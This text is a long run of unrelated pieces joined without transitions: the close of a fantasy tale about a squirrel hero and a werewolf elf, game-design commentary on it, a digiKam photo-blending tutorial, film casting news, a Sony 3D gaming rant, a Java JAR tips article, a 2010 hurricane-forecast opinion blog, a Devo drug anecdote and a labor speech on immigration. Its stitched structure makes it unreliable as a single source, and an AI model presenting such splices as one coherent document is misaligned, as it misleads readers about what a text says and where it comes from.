Root took her hand and guided her away .
She noticed as they ran that they were flanked by all manner of scurrying rodents .
Squirrels , chipmunks and ground hogs ran with them .
High above the owls watched , eager to know who would be the victor in this contest .
" Where are we running ? " asked Cameda .
" There is no need to run any longer , " said Root .
" He has found us . "
Across the shallow stream stood the werewolf , its face still stained with Itho ’s blood .
Again and again , it called for the squirrel -- the squirrel and the golden ring .
With Itho ’s sword , the monster hacked through tree limbs in its madness .
It would be a mercy to slay this creature , thought Root .
A wind blew and he could smell the desperation .
He nodded his head .
It would be done .
Princess Cameda looked over Root ’s red shoulder at the crazed creature .
There was something in the way it swung its shoulders and the careless way it twirled on its feet .
Her mind swam with hurtful memories .
She withdrew her hand from her pocket , knowing what she clutched in her fingers .
" It can not be , " said the princess , her voice spent of all emotion .
" It is so , " said Root .
" The monster is Itho ’s brother . "
Root stared out across the stream .
" The time is now , " he said .
" I must face him . "
Cameda drew a silver blade out from the sheath at her back .
" This was my mother ’s blade .
It was forged by the dwarves at the dawn of time .
It is said to have killed dragons . "
She knelt in the muddy ground .
" Take this weapon , oh protector , " said the princess , " guardian of the forest . "
Root emerged from the trees , sword in hand .
This was the time .
He felt the spirit flowing through him .
The outsider must be destroyed for the good of the forest , for the good of the tribe , for Matagan !
The wolf saw him and froze .
The monster ’s lips peeled back across its sharp yellow teeth .
The werewolf laughed , tossing Itho ’s sword from hand to hand .
With a final snarl , he charged .
Root set his feet and launched toward the villain .
Root knocked away a series of savage blows , relying on greater reflexes and the teachings of his murdered master .
It was not enough .
The squirrel man leapt up onto a tree .
Howling victory , the werewolf chopped at the tree trunk .
The forest went silent as Cameda emerged from the trees .
Around her the rodents watched .
Slowly she stepped out across the stream .
The werewolf turned to face her , wiping away its slobber .
It pulled the sword from the tree and she stepped back .
She held forth her arms in supplication .
In her hands she held the ring .
" Niira , " she said , " I know it ’s you . "
The fur of the werewolf ’s head fell away , revealing the face of a confused elf .
He staggered forward .
" Cameda , " he said , " I ... "
Blood spilled from the werewolf ’s mouth as the squirrel man plunged his blade down into the side of its neck .
Root yanked the blade free as the naked elf sank to ground , blood pouring across his chest .
The squirrel man dropped the sword down next to his fallen foe and walked toward the growing crowd of animal people .
He turned to say a word to Cameda as she ran by but was quickly swept away by a wave of cheering rodents .
" Why did you do it ? " cried Cameda , her hands desperately trying to staunch the flow of blood from Niira ’s neck .
" My love for you , " croaked the monster , " is greater than that for the forest . "
That night , high in the trees , Root sat watching the full moon .
All around him the little ones chattered , safe now , and thankful to the spirit for sending such a brave hero .
Root laughed and sang one of the tunes Matagan used to sing when he was young .
When all the little squirrels and chipmunks were asleep
Root hopped across to his old den , too small for him now , but familiar .
Above in the leaves , the owl woman waited .
" Laugh while you can , little tree mouse , " said Buldagra .
" It is said the spirit shines on us all .
We will see how long you can escape the shadows . "
As he watched the owl woman disappear into the stars , Root thought on all that had passed .
The shadows might be long , he thought , but all are followed by bright sunshine .
Analysis
In this story , the forest spirit is associated to three fairly separate groups , the animal people , the satyrs and the elves .
The druid acts as an intermediary for the elves , where the animal people are acted upon more directly and they have a relationship with the animals which is natural to all involved .
There is some tension between the elves and animal people despite their common object of worship , but there is also respect ( Matagan and Itho are referred to as friends , and the princess respects the animal people as guardians of the forest ) .
The satyrs are simply associated with the forest spirit's physical presence here , but that relationship was not examined .
There is a notion of the spirit's favor , which can presumably be lost , and among the animal people , protection of the forest spirit stopped the owl woman from preying on Matagan the squirrel man .
The forest spirit appeared in a grove , but the location might not be a permanent one .
There were a few physical transformations from one form to another here .
We 've discussed the complications in the past of tying one body to another , and there 's an additional complication in this story of a partial transformation between two forms ( not just the animal people being halfway between an animal and a " full " humanoid , but when the werewolf get his elf head back when he is startled / confused ) .
The horrifying events in the beginning of the story lingered on in the squirrel enough for the druid to sense a dark aura , and it was possible at that point to divine the past events .
The historical events are already stored , so it would just need to tie them to a temporary residual effect .
The wasting ennui-sickness of immortals popped up through the druid , though you can never be too tired of life to get others drunk !
It 's tricky to simulate faithfully since it presumably takes a while , but this kind of thing could happenly on occasion at random influenced by personality traits and ( a lack of ) historical events , say .
The owl woman shows some discretion in not hunting the squirrel when the guard approaches .
This sort of thing is sorely lacking among the predatory creatures .
They really need to prioritize things even when they are targeting something .
There comes a time when Itho decides to sever his ties with his entity and resign his entity position , though he ultimately continues on an entity - based quest for spiritual reasons ( feeling bound by the will of the forest spirit ) .
This kind of individual / entity tension should drive a lot of what goes on in the world .
The owl woman at one point offers information in exchange for Root ( as dinner ) , although she likely did n't expect the elf to give up the squirrel .
If an AI critter can make these kind of half - hearted requests of the player during the course of a conversation , there 's a danger that the player could take them too seriously , but it might be fun to develop that kind of interaction .
It would take a great deal of confidence to play with an opponent when a single strike can be fatal , but having an AI critter sadistically prolong a battle should be possible .
They could mock the player while they are attempting this if the player is involved .
There was an instance of grief - stricken wandering .
Dwarves can currently be stricken with melancholy , but it would be more interesting if they wandered off to familiar locations , etc .
There are a few objects in the story ( the mother 's blade as well as perhaps the gilded glass ) that came from the dwarves , and this type of cross-cultural interaction should be reflected everywhere .
At the beginning , there 's a combat situation that respects the position of one combatant behind another for an extended period of time , and there are attacks like over the shoulder throws and strangulation mentioned .
The villain is also fatally wounded from his blindside when he becomes distracted .
That sort of positional information is only respected for specific strikes right now , and it 's pretty vague and unclear even when those happen , so this can be worked on quite a bit .
A body became gradually covered into the debris on the forest floor .
Forests need leaf litter and humus in general .
No matter how good your camera is , taking a well - exposed photo of a high - contrast scene like a black bird on snow can be really tricky .
Even if you switch to the manual mode and tweak the exposure settings , there is still a risk that you will end up with a shot containing under - or overexposed areas .
One way to solve this problem is to use exposure blending .
This technique involves taking several shots of the same scene or subject with different exposures and then fusing these shots into one perfectly exposed photo .
While exposure blending sounds simple in theory , achieving usable results can be a rather laborious and time - consuming process .
Fortunately , digiKam can do the donkey job for you thanks to an exposure blending tool bundled with the Kipi plugins .
The exposure blending tool relies on the hugin application for processing and fusing photos , so you must install it on your machine beforehand .
On Ubuntu , this can be done using the sudo apt - get install hugin command .
To keep things tidy , move the photos you want to blend into a separate album , select them using the Ctrl +
A keyboard shortcut , and choose Tools | Blend bracketed images .
This opens the Exposure Blending Import wizard that guides you through the entire process .
In the Set Bracketed Images window , add other photos if needed , and remove and rearrange the photos that are already in the list .
Hit then the Next button to move to the next step .
digiKam can align the selected photos before blending them .
This feature can come in handy if you took the photos without a tripod .
If this is the case , tick the Align bracketed images check box , and press Next to start the pre-processing .
Once digiKam is done , press Finish , and you will be automatically dropped into the Exposure Blending editor .
Hit the Preview button to see the blended photo in the preview pane .
If you are not satisfied with the result , you can tweak the available options , including exposure , saturation , and contrast .
You can also exclude individual photos from the stack to improve the blending result .
The clever part is that every time you tweak the settings and press the Preview button , digiKam generates a preview image which you can compare with the previous versions .
You can then save all the generated versions , or save only the one you like most .
Although digiKam ’s exposure blending tool is not the most powerful or flexible solution out there , it is capable of producing rather impressive results , especially if you are not afraid of getting your hands dirty with manually tweaking the final results .
Dominic Cooper Joins Captain America Cast as Howard Stark
It 's official : English actor Dominic Cooper has been tapped by Marvel Studios to portray a young Howard Stark in the upcoming " Captain America : The First Avenger " film .
From Marvel 's press release :
In the film , Cooper will portray the younger version of Howard Stark , the character which John Slattery portrayed in " Iron Man 2 . "
Joe Johnston will direct the film penned by Christopher Markus & Stephen McFeely .
Marvel Studios ' Kevin Feige will produce " Captain America : The First Avenger . "
Alan Fine , Stan Lee , David Maisel , Nigel Gostelow and Louis D'Esposito will executive produce .
The film will be released in the U.S. on July 22 , 2011 and distributed by Paramount Pictures .
" Captain America : The First Avenger " will focus on the early days of the Marvel Universe when Steve Rogers volunteers to participate in an experimental program that turns him into the Super Soldier known as Captain America .
Cooper joins a cast which already includes Chris Evans , Tommy Lee Jones , Hugo Weaving , Hayley Atwell , Sebastian Stan and Stanley Tucci .
Now think about this connection : Dominic Cooper is playing Howard Stark , who was played by John Slattery in Iron Man 2 , who is also a partner in Stirling Cooper in Mad Men .
Coincidence ?
I think not .
Continue Reading Below Advertisement
Killzone 3 might be the most significant of the games
Sony showed today , but not in a good way .
Sony , perhaps horrified at the spectacle that was Microsoft and its demonstration of its motion control gimmick , barely mentioned Move , their own motion control gadget .
The long gaps in their presentation , when it appeared they were trying very hard to fill time , made me think they took one look at the reaction to Xbox Kinect yesterday and quietly nudged Move under the sofa with their toe .
Instead , they spent most of the time talking up how you could play Killzone 3 in 3D .
Well , as long as you have a 3D TV , also known as " The TV that costs several thousand dollars and requires $ 150 glasses to watch . "
A 52 - inch 3D TV will cost $ 5,000 , though at least that one comes with two pairs of glasses .
Even then , if you want to have a few friends over , they 'll need glasses too .
So that 'll cost you as much as a new console .
That 's assuming the headaches do n't keep them away .
Continue Reading Below Advertisement
Do n't get me wrong ; I 'm sure one day 3D TV's will be common .
That point will be right after you no longer need glasses for them to work .
Oh , and when the TVs cost less than a new kidney .
In the mean time , Sony is spending all of their energy touting a feature that the vast majority of gamers wo n't be able to take advantage of for several years .
It 's as simple as that .
Hell , most of us just bought our HD TVs in the last few years , we 're sure as hell not ready to upgrade yet .
When Sony did mention Move , it came off as a brief afterthought .
They showed off Sorcery , which appears to be a Harry Potter game only without the familiar character and lucrative license .
5 things you did n't know about ...
JARs
A Java Archive is more than just a bundle of classes
Content series :
This content is part # of # in the series : 5 things you did n't know about ...
Stay tuned for additional content in this series .
This content is part of the series : 5 things you did n't know about ...
Stay tuned for additional content in this series .
For most Java developers , JAR files and their specialized cousins , WARs and EARs , are simply the end result of a long Ant or Maven process .
It 's standard procedure to copy the JAR to the right place on the server ( or , more rarely , the user 's machine ) and forget about it .
Actually , JARs can do more than store source code , but you have to know what else is possible , and how to ask for it .
The tips in this installment of the 5 things series will show you how to make the most of Java Archive files ( and in some cases WARs and EARs , too ) , especially at deployment time .
Because so many Java developers use Spring ( and because the Spring framework presents some particular challenges to our traditional use of JARs ) , several of the tips specifically address JARs in Spring applications .
About this series
So you think you know about Java programming ?
The fact is , most developers scratch the surface of the Java platform , learning just enough to get the job done .
In this series , Ted Neward digs beneath the core functionality of the Java platform to uncover little - known facts that could help you solve even the stickiest programming challenges .
I 'll start out with a quick example of a standard Java Archive file procedure , which will serve as a foundation for the tips that follow .
Put it in a JAR
Normally , you build a JAR file after your code source has been compiled , collecting the Java code ( which has been segregated by package ) into a single collection via either the jar command - line utility , or more commonly , the Ant jar task .
The process is straightforward enough that I wo n't demonstrate it here , though later in the article we 'll return to the topic of how JARs are constructed .
For now , we just need to archive Hello , a stand - alone console utility that does the incredibly useful task of printing a message to the console , shown in Listing 1 :
Listing 1 .
Archiving the console utility
package com.tedneward.jars ; public class Hello { public static void main ( String [ ] args ) { System.out.println ( " Howdy ! " ) ; } }
The Hello utility is n't much , but it 's a useful scaffold for exploring JAR files , starting with executing the code .
1. JARs are executable
Languages like .NET and C++ have historically had the advantage of being OS - friendly , in that simply referencing their name at the command - line ( helloWorld.exe ) or double - clicking their icon in the GUI shell would launch the application .
In Java programming , however , a launcher application — java — bootstraps the JVM into the process , and we have to pass a command - line argument ( com.tedneward .
Hello ) indicating the class whose main ( ) method we want to launch .
These additional steps make it harder to create user - friendly applications in Java .
Not only does the end user have to type all of these elements at the command - line , which many end users would rather avoid , but chances are good that he or she will somehow fat - finger it and get an obscure error back .
The solution is to make the JAR file " executable " so that the Java launcher will automatically know which class to launch when executing the JAR file .
All we have to do is introduce an entry into the JAR file 's manifest ( MANIFEST.MF in the JAR's META - INF subdirectory ) , like so :
Listing 2 . Show me the entrypoint !
Main - Class : com.tedneward.jars .
Hello
The manifest is just a set of name - value pairs .
Because the manifest can sometimes be touchy about carriage returns and whitespace , it 's easiest to use
Ant to generate it when building the JAR .
In Listing 3 , I 've used the manifest element of the Ant jar task to specify the manifest :
Listing 3 . Build me the entrypoint !
< target name = " jar " depends = " build " > < jar destfile= " outapp.jar " basedir= " classes " > < manifest > < attribute name= " Main - Class " value= " com.tedneward.jars .Hello " /> </ manifest > </ jar > </ target >
All a user has to do to execute the JAR file now is specify its filename on the command - line , via java - jar outapp.jar .
In the case of some GUI shells , double - clicking the JAR file works just as well .
2. JARs can include dependency information
It seems that word of the Hello utility has spread , and so the need to vary the implementation has emerged .
Dependency injection ( DI ) containers like Spring or Guice handle many of the details for us , but there 's still a hitch : modifying code to include the use of a DI container can lead to results like what you see in Listing 4 :
Listing 4 . Hello , Spring world !
package com.tedneward.jars ; import org.springframework.context.annotation.AnnotationConfigApplicationContext ; public class Hello { public static void main ( String ... args ) { AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext ( AppConfig.class ) ; Speaker speaker = context.getBean ( " speaker " , Speaker.class ) ; System.out.println(speaker.sayHello( ) ) ; } }
More about Spring
This tip assumes you are familiar with dependency injection and the Spring framework .
Because the - jar option to the launcher overwrites whatever happens to be in the - classpath command - line option , Spring needs to be on the CLASSPATH and in the environment variable when you run this code .
Fortunately , JARs permit a declaration of other JAR dependencies to appear in the manifest , which implicitly creates the CLASSPATH without you having to declare it , shown in Listing 5 :
Listing 5 . Hello , Spring CLASSPATH !
< target name = " jar " depends = " build " > < jar destfile= " outapp.jar " basedir= " classes " > < manifest > < attribute name= " Main - Class " value= " com.tedneward.jars .Hello " /> < attribute name = " Class - Path " value= " ./lib/org.spring-aop-5.0.0.BUILD-SNAPSHOT.jar
./lib/spring-beans-5.0.0.BUILD-SNAPSHOT.jar ./lib/spring-context-5.0.0.BUILD-SNAPSHOT.jar
./lib/spring-core-5.0.0.BUILD-SNAPSHOT.jar ./lib/spring-expression-5.0.0.BUILD-SNAPSHOT.jar ./lib/commons-logging-1.2.jar " /> </ manifest > </ jar > </ target >
Notice that the Class - Path attribute contains a relative reference to the JAR files that the application depends on .
You could also write this as an absolute reference or without a prefix entirely , in which case it would be assumed that the JAR files were in the same directory as the application JAR .
Unfortunately , the value attribute to the Ant Class - Path attribute has to appear in one line , because the JAR manifest can't cope with the idea of multiple Class - Path attributes .
So , all of those dependencies have to appear on one line in the manifest file .
Sure , it 's ugly , but being able to java - jar outapp. jar is worth it !
3. JARs can be implicitly referenced
If you have several different command - line utilities ( or other applications ) that make use of the Spring framework , it might be easier to put the Spring JAR files into a common location that all of the utilities can reference .
Doing so avoids having multiple copies of JARs popping up all over the filesystem .
The Java runtime 's common location for JARs , known as the " extension directory , " is by default located in the lib / ext subdirectory , underneath the installed JRE location .
The JRE is a customizable location , but it is so rarely customized within a given Java environment that it 's entirely safe to assume that lib / ext is a safe place to store JARs , and that they will be implicitly available on the Java environment 's CLASSPATH .
4. Classpath wildcards allowed
In an effort to avoid huge CLASSPATH environment variables ( which Java developers should have left behind years ago ) and / or command - line - classpath parameters , Java 6 introduced the notion of the classpath wildcard .
Rather than having to launch with each and every JAR file explicitly listed on an argument , the classpath wildcard lets you specify lib /* , and all of the JAR files listed in that directory ( not recursively ) , in the classpath .
Unfortunately , the classpath wildcard does n't hold for the previously discussed Class - Path attribute manifest entry .
But it does make it easier to launch Java applications ( including servers ) for developer tasks such as code - gen tools or analysis tools .
5. JARs hold more than code
So many parts of the Java ecosystem , depend on configuration files that describes how the environment should be established and it's entirely common for developers to forget to copy the configuration file alongside the JAR file .
Some configuration files are editable by a sysadmin , but a significant number of them are well outside of the sysadmin 's domain , which leads to deployment bugs .
A sensible solution would be to package the config file together with the code — and it's doable because a JAR is basically a ZIP in disguise .
Just include config files in the Ant task or the jar command - line when building a JAR .
JARs can also include other types of files , not just configuration files .
For instance , if my SpeakEnglish component wanted to access a properties file , I could set that up like Listing 6 :
Listing 6 . Respond at random
package com.tedneward.jars ; import java.util .* ; public class SpeakEnglish implements ISpeak { Properties responses = new Properties ( ) ; Random random = new Random ( ) ; public String sayHello ( ) { //
Pick a response at random int which = random.nextInt ( 5 ) ; return responses.getProperty ( " response . " + which ) ; } }
Putting responses .
properties into the JAR file means that there 's one less file to worry about deploying alongside the JAR file .
Doing that just requires including the responses .
properties file during the JAR step .
Once you 've stored your properties in a JAR , though , you might wonder how to get them back .
If the data desired is co-located inside the same JAR file , as it is in the previous example , then do n't bother trying to figure out the file location of the JAR and crack it open with a JarFile object .
Instead , let the class 's ClassLoader find it as a " resource " within the JAR file , using the ClassLoader getResourceAsStream ( ) method shown in Listing 7 :
Listing 7 . ClassLoader locates a Resource
package com.tedneward.jars ; import java.util .* ; public class SpeakEnglish implements ISpeak { Properties responses = new Properties ( ) ; // ... public SpeakEnglish ( ) { try { ClassLoader myCL = SpeakEnglish.class.getClassLoader ( ) ; responses.load ( myCL.getResourceAsStream ( " com/tedneward/jars/responses.properties " ) ) ; } catch ( Exception x ) { x.printStackTrace ( ) ; } } // ... }
You can follow this procedure for any kind of resource : configuration file , audio file , graphics file , you name it .
Virtually any file type can be bundled into a JAR , obtained as an InputStream ( via the ClassLoader ) and used in whatever fashion suits your fancy .
Conclusion
This article has covered the top five things most Java developers do n't know about JARs — at least based on history and anecdotal evidence .
Note that all of these JARs - related tips are equally true for WARs .
Some tips ( the Class - Path and Main - Class attributes in particular ) are less exciting in the case of WARs , because the servlet environment picks up the entire contents of a directory and has a predefined entry point .
Still , taken collectively , these tips move us beyond the paradigm of " Okay , start by copying everything in this directory ... "
In so doing , they also make deploying Java applications much simpler .
Downloadable resources
Related topics
2010 Hurricane Season Forecast : Let us begin with the 2010 hurricane season prognastication of Dr. James Hansimian ( video ) .
He is predicting 6 to 8 hurricanes for the 2010 season .
Never heard of him ?
You probably will .
You see , he is a chimpanzee whom the National Center for Public Policy Research has put on the record in an effort to emphasize how little humans really know about the climate .
They claim that NOAA has been “ wrong three out of the last 4 years and 7 of the last 11 . ”
They say they are not hiring “ Dr. Hansimian ” to ridicule the effort and dedication of climate and hurricane specialists but instead to highlight that , even with the greatest minds , competence , tools and methodology , humans do not have a complete understanding of the climate .
They say that they will make another video in December 2010 of Dr. Hansimian and determine who was more correct .
In the meantime , let us look what some of the leading authorities have to say .
Now , I already had a pretty good idea of what the National Hurricane Center would say .
What is amazing to me though is the media coverage .
I looked at the headline from USA Today and it says , Fierce Hurricane Season Predicted .
CNN had a story about the exact same subject but its link was a more subdued , “ Hurricane Season Could be Above Average . ”
Nevertheless , the actual headline to the story was a more menacing , “ Hurricane Season Could be ‘ Active ’ or “ Extremely Active . ' ”
AFP via Yahoo News was even more dramatic by trumpeting , “ 2010 Hurricane Season May Be Worst on Record . ”
But , Reuters via Yahoo News had a little different spin as its headline read , “ Government Warns of Worst Hurricane Season Since 2005 . ”
Fox News says , “ Hurricane Season Could be Strongest Ever Say Top Meteorologists . ”
I have yet to find any quote from anyone at NOAA or the NHC that verifies any of these headlines except fo the one from CNN , which not - coincidentally is the least sensational .
Interestingly , CBS4 in South Florida took a different tact .
Instead of focusing on the threat to the United States , instead its headline was , “ NHC Director Fears For Haiti This Hurricane Season . ”
That one is right on the money .
A tropical cyclone for Haiti of any magnitude would not be good and they get nailed in one form or another very frequently .
So , what did was the National Hurricane Center 2010 Atlantic Hurricane Season Forecast on May 27 ?
To begin with , the press release from the NHC had a headline that read , “ NOAA Expects Busy Atlantic Hurricane Season . ”
Note that this headline lacks the hyperbole and extreme adjectives of the media .
As usual , they give themselves a wide berth by saying that there will be between 14 and 23 named storms .
That would be tropical cyclones of tropical storm force or more .
The difference between 14 and 23 is pretty large .
Eight to 14 of those storms are expected to be hurricanes with 3 to 7 becoming major hurricanes which means category 3 or greater .
For the past several years , NOAA taking some of the thunder from the NHC .
I believe they are in the process of changing the name of the NHC to the NOAA National Hurricane Center ; I suppose it ’s an effort to establish that its a governmental agency .
In any event , the initial quote from their press release is not from an NHC forecaster or the Director .
Instead , its from the Under - Secretary of Commerce , who said , “ If this outlook holds true , this season could be one of the more active on record . ”
Notice she said “ If ” and “ could ” and related it to “ one of the more active ” seasons .
The reason they give is warm ocean waters , no El Nino and a decadal cycle .
The last one is the most significant .
Accepted science generally has concluded that the Atlantic season goes in cycles of about 30 years in which there is great activity and , conversely , 30 years with low activity .
Since 1995 , we have been in an “ active era . ”
Now , the 2005 Atlantic Hurricane Season was the most active in recorded history .
Keep in mind that it fell in part of the current “ active era ” and that recorded history is limited .
The first hurricane tracked by satellite was Hurricane Camille in 1969 so prior to that , only ship reports were able to confirm hurricanes and ships kinda like to avoid storms so its possible there were several over the years that were missed .
Anyway , in 2005 there were 28 named storms with 15 hurricanes including the two notable powerful storms , Rita and Katrina .
That means , in order for the headlines of some of these media outlets to be accurate , the 2010 hurricane season would have to have 5 more named storms than the top end of the forecast and one more hurricane than the extreme forecasted .
The headlines also neglect to take into account a very important and possible caveat from the press release that could put a damper on the number of storms :
“ The main uncertainty in this outlook is how much above normal the season will be .
Whether or not we approach the high end of the predicted ranges depends partly on whether or not La Niña develops this summer , ” said Gerry Bell , Ph.D. , lead seasonal hurricane forecaster at NOAA ’s Climate Prediction Center .
“ At present we are in a neutral state , but conditions are becoming increasingly favorable for La Niña to develop . ”
Now , for 27 years one of the leading hurricane forecasting expert has been Dr. William Gray from Colorado State University .
Until recent years , he was about the only one who tried to make a forecast .
The NHC lately has been getting into the game and diminishing the role of Dr. Gray .
Dr. Gray is now has handed over some of the duties to Dr. Phil Klotzbach and the pair lead the efforts at Colorado State .
Back in early April , the Colorado State University team issued their 2010 Atlantic Hurricane Season Forecast and noted warm ocean temperatures and a weakening El Nino as the reason for a more active season .
However , their numbers are more pedestrian .
They suggest 15 named storms with 8 becoming hurricanes and 4 of those becoming major hurricanes .
They go a step further and say that there is a 69 % probability of major hurricane striking the US which is higher than the 52 % of the 20th century .
Another tropical cyclone forecasting service , Tropical Storm Risk ( TSR ) has 2010 Atlantic Hurricane Season Forecast is somewhere in between the NHC and CSU with 16.3 (+/- 4.1 ) named storms , 8.5 (+/- 2.8 ) hurricanes and 4 (+/- 1.7 ) major hurricanes .
On average , the number of named storms in any given year in the North Atlantic is 10 ( 9.6 ) with 6 ( 5.9 ) hurricanes and 2.3 of those becoming major hurricanes .
So , both forecast teams are predicting an above average season .
It would seem that the folks at CSU might be a looking on the low end with an eye on the El Nino not diminishing completely to neutral until after the hurricane season has started .
The NHC seems to be banking on the El Nino coming to an end sooner , or at least allowing for that possibility , thus they have the substantially larger number of storms on the high end of their range .
But , again ….
Dr. Gerry Bell ’s words make it sound as if they think that a La Nina condition developing is a real possibility .
The two forecasts are almost identical except that the NHC gives itself a wide berth so , if by chance there are a bunch of storms , then they can say they said so .
They also can avoid making any huge revisions as the season progresses as has been done with some initial hurricane season forecasts in the past .
The truth is , it ’s just a forecast .
We ’re in the middle of an active 30 year cycle and so its expected to be more active .
How much more active is an academic exercise .
In the first place , it ’s impossible to predict so far out any specific disturbance developing in exactly the right conditions .
Remember , you need more than just warm water to have a tropical cyclone .
Also , just because a tropical cyclone develops , it does n’t mean that it will hit land .
A tropical cyclone ’s job in nature is to transport heat and moisture from the tropical region to the polar region .
They do n’t really care if there is land in the way or ocean .
And one more thing …. note that nothing was said about Global Warming in either the Colorado State University forecast or the National Hurricane Center outlook .
They do refer to a warm surface temperature anomoly , but that is about as close as you get .
And , if it were due to Global Warming or Climate Change , then it would stand to reason that there would be more tropical cyclones all around the world .
As it happens , the NHC forecasts a Below Average Eastern Pacific Hurricane Season .
Beyond that , Tropical Storm Risk ( TSR ) has a 2010 NW Pacific Typhoon Season Forecast that is near average .
TSR also has a forecast for the Australian region for tropical activity to be about 10 % below average .
Going by the forecasts … well above average for the North Atlantic , below average for the Eastern Pacific and Australian region and about average for the NW Pacific .
Does n’t sound like a global climate calamity , does it ?
So , if the 2010 Atlantic hurricane season does have a signficant number of hurricanes , get ready for the media reports that try to tie it to Global Warming .
But , do n’t believe it .
And , if the number that actually does come about is less than forecast ( as was the case in 2009 ) then look for an explainer , which the NHC has already conveniently put out there .
See , they ’re pretty smart .
If the season is slightly above average , they can say , “ we said so . ”
If its way above average , they can say , “ we said so . ”
And if the number of storms is less than the predicted range , they can say , ” we warned you about a possible La Nina . ”
All the bases are covered .
That ’s what a lot of guys on TV do as they can always claim victory , no matter what , when they say “ Variable cloudy skies and a 50 % chance of rain . ”
Weather Bottom Line : I had to go to Gravel Switch Kentucky to help the folks at Kentucky ’s oldest store , Penn ’s Store .
Actually , it ’s not just Kentucky ’s oldest store , it is considered the oldest country store in America .
I am told that it began operation in 1845 , though I ’ve seen published reports that claim 1850 .
But , I think I ’ll go with the word of the Penn family .
About a month ago , when Tennessee was getting relatively sparse coverage of flooding , Kentucky got even less coverage .
Of course , South Central Kentucky only got 11 inches of rain and parts of Tennessee got 15 - 20 inches so I suppose that it fits that if Tennessee got slim coverage , then Kentucky got none .
Anyway , I was helping them clean up and rid the store of a snake and so I could not post on Thursday when the NHC Hurricane Forecast came out .
So , I ’m a day late .
I did see a few towering cumulous clouds late in the day … about the time I was playing St. Patrick and ridding the Penn ’s Store of a 4 or 5 foot snake .
On our return to Louisville , there were some pretty decent wind gusts and it was much cooler , leading me to believe that there were some decent thunderstorms around , which did not surprise me .
The weak boundary will still be in the area on Friday so we will see some scattered storms again with highs in the mid 80’s .
We warm a bit over the weekend with highs in the mid to perhaps upper 80’s .
We may have an isolated t’storm on Sunday but more likely there will be scattered afternoon storms on Memorial Day .
Oops !
It looks like the page you are looking for no longer exists .
Sorry for the inconvenience !
You may find what you 're looking for here .
Paul Krassner once took acid with Groucho Marx .
Similarly Devo's Mark Mothersbaugh recounts smoking PCP with Michael Jackson and Andy Warhol .
From The Big Issue :
" The only time in my life I smoked angel dust was by accident and it was on a double date with Andy Warhol and Michael Jackson , " laughs Mothersbaugh .
" We all went to Studio 54 and people were passing drugs all over the place .
" Michael Jackson had just finished doing the movie The Wiz and still looked like Michael Jackson back then – he had an Afro and he was still black .
He passed me a joint and I thought , well OK , we do n't have marijuana in Ohio so I 'll try it . "
Minutes later Mothersbaugh found himself on the dancefloor as pillars of light were swirling around " like weedcutters " knocking people over and cutting them up .
He turned to his date in horror , only to hear her say : " You did n't smoke any of that angel dust did you ? "
Here is the Avatar trailer ( HD with English audio ) in glorious YT3D !
This is the real thing , I can't wait for the 3D Bluray !
The economic course our nation started on in 1980 -- the effort to have a low - wage , high - consumption society that imports more and more of what it consumes -- has hit the wall .
We cannot afford to stay this course -- of letting the private sector and the financial markets run amok , of outsourcing everything that 's not nailed to the floor , and of pushing down workers every chance we get .
And last night 's vote by Republicans in the United States Senate to block a simple extension of unemployment benefits for the most hard - pressed people without jobs is just the latest shame .
At some point , there is nobody left to buy the junk that we import from everywhere but here .
We now face a future of prolonged high unemployment and stagnant or falling wages — unless we do something different .
Today I am going to talk about doing something different .
We need a new national economic strategy for a global economy .
At the heart of our strategy must be a workforce with world class skills and world class rights and trade policies that serve the interests of the American people .
But today I also want to talk to you about what may seem like a strange subject -- immigration -- because it is patently clear that we cannot talk about our national workforce strategy unless we face head - on our own contradictions , hypocrisy and history on immigration .
The truth is that in a dynamic global economy in the 21st century , we simply cannot afford to have millions of hard - working people without legal protections , without meaningful access to higher education , shut off from the high - wage , high - productivity economy .
It is just too costly to waste all that talent and strength and drive .
But immigration reform is not just an economic issue .
The way we as a nation treat the immigrants among us is about more than economic strategy -- it is about who we are as a nation .
I grew up in a small town in Southwestern Pennsylvania , not that far from here .
The immigrant path led from the coalmines to Pittsburgh to Cleveland .
And if you look around Cleveland at the ethnic clubs and the churches , you see a city that immigrants built -- Hungarians and Poles , Irish and Italians , Serbs and Croats and Jews , as well as African Americans .
Cleveland is a city where the traditions of the places we came from are the very foundation of our community .
It was not easy when my family came to this country .
My parents fled poverty and war from different corners of Europe .
When I was a kid , there was an ugly name for every one of us in all twelve languages spoken in Nemacolin , PA -- wop and hunkie and polack and kike .
We were the last hired and first fired , the people who did the hardest and most dangerous work , the people whose pay got shorted because we did n't know the language and were afraid to complain .
We got to the mines and the mills , and the people already there said we were taking their jobs , ruining their country .
Yet in the end the immigrants of my parents ' and grandparents ' generation prevailed , and built America .
This is the history of my family , and this is the story of Cleveland and Pittsburgh and Detroit and Chicago and Baltimore and a thousand cities and towns across America .
And yet today I hear from working people who should know better , some in my own family -- that those immigrants are taking our jobs , ruining our country .
Have n't we been here before ?
When I hear that kind of talk , I want to say , did an immigrant move your plant overseas ?
Did an immigrant take away your pension ?
Or cut your health care ?
Did an immigrant destroy American workers ' right to organize ?
Or crash the financial system ?
Did immigrant workers write the trade laws that have done so much harm to Ohio ?
My friends , we are most of us the children of immigrants .
But there was no labor movement in America until workers learned to look at each other and see not immigrants and native born , not white and black , not different last names , but our common fate as workers .
The labor movement believes that our goal as a nation should be a future of shared prosperity -- not stubborn unemployment and a lost generation .
That our economic strategy must bring us together instead of driving us apart .
Our strategy must help us be the kind of country we want our children to thrive in -- the country our history tells us we can be .
The home of the American Dream .
So exactly what is the American Dream ?
Some will tell you the American Dream is the idea that in America anyone can become rich .
And the fact that the upper reaches of our society are relatively open is a good thing about our country -- but it is not the American Dream .
The American Dream is not that a few of us will get to be rich , but that all of us will have a fair portion of the good things in life .
Time to be with our families .
The chance for our children to get an education and the opportunity to make their own way in the world .
Laws that protect us , not oppress us .
The American labor movement is all about the pursuit and the defense of this idea of America .
And we have learned through our history that it is only when working people stand together -- in the workplace and at the polling place -- that the American Dream is secure .
Recently , the American Dream brought a man my age named Elvino and his son Ramon to America from Mexico .
They are experienced bricklayers and were hired to work on a large mixed - use housing development -- a public project .
They and thirty others worked for five weeks , and the contractor just never paid them .
For too many immigrants seeking the American Dream , this is the American reality .
Hard work rewarded with ripoffs .
And then no way to seek justice .
That 's why I am so proud to be able to say that Elvino , Ramon and their co-workers are taking this injustice to the U.S. Department of Labor , thanks to the efforts of Bricklayers Union Local 18 in Cincinnati and the Interfaith Worker Rights Center -- whose members understand that truly an injury to one is an injury to all .
Immigration to the United States is part of a larger picture -- the picture of how we are getting globalization wrong .
